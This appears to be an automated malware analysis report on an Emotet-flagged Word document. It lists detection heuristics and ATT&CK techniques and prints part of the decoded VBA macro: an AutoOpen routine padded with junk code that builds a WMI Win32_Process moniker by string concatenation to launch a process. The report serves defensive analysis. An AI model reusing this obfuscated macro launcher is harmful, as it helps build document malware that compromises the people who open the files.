MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains legacy WordBasic auto-exec markers and VBA macros, specifically an AutoOpen macro. Critical heuristics indicate the use of GetObject and WMI to launch a process, a common technique for Emotet. The ClamAV signature also explicitly identifies it as Emotet.
Heuristics (7)
- ClamAV: Doc.Malware.Emotet-6960319-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emotet-6960319-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical, OLE_VBA_WMI_PROCESS_CREATE]: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27709 bytes |

SHA-256: e0c2b71cf4b4086de0fd35eb8aab44f5184edbf4997afb361dcb23f6510110ec
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "i_7_49"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "W452789"
Attribute VB_Base = "0{26B1CED9-294D-4291-96ED-B3DA0540AACB}{1BEB1573-C98A-42BD-9D5A-463FD125D331}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "w5417665"
Attribute VB_Name = "P71257"
Attribute VB_Base = "0{7CF31FA9-AE4B-427D-B00C-EBD14E5E8970}{60A09B9E-71C1-4118-9058-BC529E75E6FB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "w_8365_6"
Function k45__2(V4_600)
Select Case N37503
Case o98_12 = F5_979 = Sgn(915663398)
Case R46_782 = U8499112
Case Y613_6 = Log(s3964_17)
Case J31742 = CBool(770043342)
Case O8095892 = 948052885
Case Z64_45 = CDate(Q49329_9)
End Select
Select Case i3872843
Case v7__1366 = K865519 = Sgn(219551326)
Case n035125 = i5451_5
Case K85848 = Log(l3210249)
Case S7_001 = CBool(993609842)
Case u456_2 = 541530122
Case I16601 = CDate(S584_7)
End Select
Set k45__2 = CVar(V4_600)
Select Case O68469
Case j4_18073 = z961953_ = Sgn(260716006)
Case f642160 = W24996
Case S449731 = Log(N931660)
Case m80858 = CBool(34746207)
Case t694450 = 596061870
Case w133453 = CDate(z0756884)
End Select
Select Case D6917810
Case P00_173 = w4660_1 = Sgn(182749233)
Case r31422 = A79538
Case l30051__ = Log(i_01765)
Case N379985 = CBool(173061214)
Case Z2950394 = 759976378
Case O2_6754_ = CDate(B73092)
End Select
End Function
Sub autoopen()
Select Case s_8_45_3
Case f6028821 = T78_36 = Sgn(89678378)
Case b67158_4 = o1776794
Case s97216 = Log(l904537)
Case V5595338 = CBool(147661988)
Case H4530329 = 941363160
Case v5771_ = CDate(R_27500)
End Select
Select Case B46719
Case B902772 = c1031__2 = Sgn(583902484)
Case i13034 = T23150_
Case N650_80 = Log(p_4766_7)
Case b_03_669 = CBool(361303888)
Case W296015 = 171051730
Case U266930 = CDate(E9018653)
End Select
Select Case T145343
Case R655895 = p086_2 = Sgn(21578397)
Case I7101639 = p_0264_6
Case W1992260 = Log(J41512)
Case Y030385 = CBool(302452967)
Case L2_70552 = 810010039
Case v15_675_ = CDate(S16138)
End Select
Call F7_2116
Select Case p90899
Case I28781_ = P848_25 = Sgn(379163554)
Case b6364785 = m44227
Case B877458 = Log(V07546)
Case A_85__ = CBool(546830911)
Case f_4274 = 339284241
Case h4_2005 = CDate(i28506)
End Select
Select Case t_6993
Case q4392_ = w8_2274 = Sgn(35180138)
Case f55071 = z64247_
Case N64_187 = Log(O_03856)
Case q8_92_7 = CBool(4062587)
Case r45253 = 17643203
Case F7898_9_ = CDate(r078_215)
End Select
Select Case z73643
Case G38789 = n2_8048 = Sgn(882778830)
Case E030459_ = M4948_2
Case a62_24 = Log(n38_45)
Case l03_49 = CBool(663889470)
Case G647__24 = 608058999
Case z01774 = CDate(J80023_1)
End Select
End Sub
Attribute VB_Name = "W136440"
Function F7_2116()
On Error Resume Next
Select Case F86813
Case B0587_35 = f63365_ = Sgn(280587394)
Case H320_130 = K513_37
Case H576021 = Log(J1997479)
Case k795156 = CBool(185070932)
Case N30796 = 418098894
Case M8014848 = CDate(m826_8_5)
End Select
Select Case P_557_
Case H343062 = F758_627 = Sgn(487222661)
Case z90_322 = T24537
Case I_5793 = Log(D44540)
Case D74541 = CBool(798423184)
Case I4_316 = 335236939
Case W7613608 = CDate(m7_71347)
End Select
Set M_375173 = k45__2(GetObject("wi" _
+ "nmg" + "mts:W" _
+ "in32_P" + "rocess" _
+ "Sta" + "rtup"))
Select Case M50341
Case U21241_8 = I25938 = Sgn(64998561)
Case z97864 = j30_438
Case q609925 = Log(a05332)
Case S2067906 = CBool(33
```
... (truncated)